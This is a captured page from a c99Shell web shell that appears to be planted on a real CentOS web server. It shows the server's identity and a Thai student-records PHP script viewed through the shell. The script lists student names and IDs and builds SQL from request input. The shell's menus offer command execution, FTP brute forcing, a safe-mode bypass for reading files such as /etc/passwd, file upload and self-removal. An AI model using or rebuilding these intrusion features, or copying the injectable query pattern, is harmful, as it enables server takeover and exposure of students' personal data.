!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/xmigratex/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     report_sy_list.php (3.84 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style.css" />
<?php
    
//$localhost_s = $_POST["localhost_s"];
    //$localhost_u = $_POST["localhost_u"];
    //$localhost_p = $_POST["localhost_p"];
    //echo "tUsername = $tUsername<br>";
    //echo "tPassword = $tPassword<br>";
    //echo "dbNo = $dbNo<br>";
//    echo "dbNo = $dbNo<br>";
    //echo '<br><br>เริ่มลบข้อมูล<br>';

    
$dbreg $_POST["dbreg"];
    
$dbmoreg $_POST["dbmoreg"];
    
$dbppc $_POST["dbppc"];
    
$oums $_POST["oums"];
    
$nums $_POST["nums"];
    
$host $_POST["localhost_s"];
    
$tUsername $_POST["localhost_u"];
    
$tPassword $_POST["localhost_p"];
    
$dbNo $_POST["dbNo"];

    
$ln_reg mysql_connect($host$tUsername$tPasswordtrue);
    if (!
$ln_reg) {
        echo 
"<font color='#FF0000'>$source_s";
        die(
' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' mysql_error());
        echo 
"</font >";
    }else{
        
//echo "Connected $source_s successfully<br>";
        
}

    
$db_info mysql_select_db($dbreg$ln_reg);
    
//mysql_query("SET NAMES 'utf8'", $ln_info);
    
if (!$db_info) {
        die (
'ไม่สามารถเชื่อมต่อฐานข้อมูล'.$dbmoreg.'ได้: ' mysql_error());
    }else{
        
//echo " เชื่อมต่อฐานข้อมูล $dbreg สำเร็จ<br>";
    
}

//echo "<br><br>";

    
$query "SELECT sm.studentId,studentCode,studentName,studentSurname ,count( passStatus ) AS passStatus 
    FROM $dbreg.StudentStatus ss
    INNER JOIN $dbreg.StudentMaster sm ON sm.studentId = ss.studentId
    WHERE passStatus IN (1,2,3) 
    GROUP BY ss.studentId 
    HAVING count( passStatus ) >3"
;
?>
<table class='tb_1' width='100%' >
<tr align=''><th class='h2'>Query ที่ใช้ในการตรวจสอบ </th></tr>
<tr align=''>
    <td class='h2'>
    <?php
    
echo $query;
    
?>
    </td>
</tr>
</table>


<table border="1" class='tb_1'>

<?php

    mysql_query
("SET NAMES UTF8"$ln_reg);
    
$result mysql_query($query$ln_reg);
    
$num_rows mysql_num_rows($result);

?>
<tr><th colspan="9" align="right">ผลลัพธ์ &nbsp; ข้อมูล&nbsp;<?php echo $num_rows?>&nbsp;แถว</th></tr>
<tr>
    <th>ลำดับ</th>
    <th>studentId</th>
    <th>รหัสนักศึกษา<br>studentCode</th>
    <th>ชื่อ<br>studentName</th>
    <th>นามสกุล<br>studentSurname</th>
    <th>จำนวนครั้งที่เลื่อนชั้น<br>passStatus</th>
</tr>
<?php
    $index 
1;
    
$stdId 0;
    
$tr_class '#e5e5e5';
    while (
$cur_row mysql_fetch_object($result)) {
        if(
$index%== 0)
            
$tr_class '#d3dce3';
        else
            
$tr_class '#e5e5e5';
        
$style "style='background-color: $tr_class ;'";
?>
    <tr >
        <td <?php echo $style?>><?php echo $index?></td>
        <td <?php echo $style?>><?php echo $cur_row->studentId?></td>
        <td <?php echo $style?>><?php echo $cur_row->studentCode?></td>
        <td <?php echo $style?>><?php echo $cur_row->studentName?></td>
        <td <?php echo $style?>><?php echo $cur_row->studentSurname?></td>
        <td <?php echo $style?>><?php echo $cur_row->passStatus?></td>
    </tr>
<?php
        $index
++;
    }
    
mysql_free_result($result);
    if(
$index == 1){
?>
    <tr ><td align='center' colspan='6'>
    ไม่พบข้อลูกการเลื่อนชั้นปีเกิน 3 ครัง
    </td></tr>
<?php
    
}
?>
</table >

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0112 ]--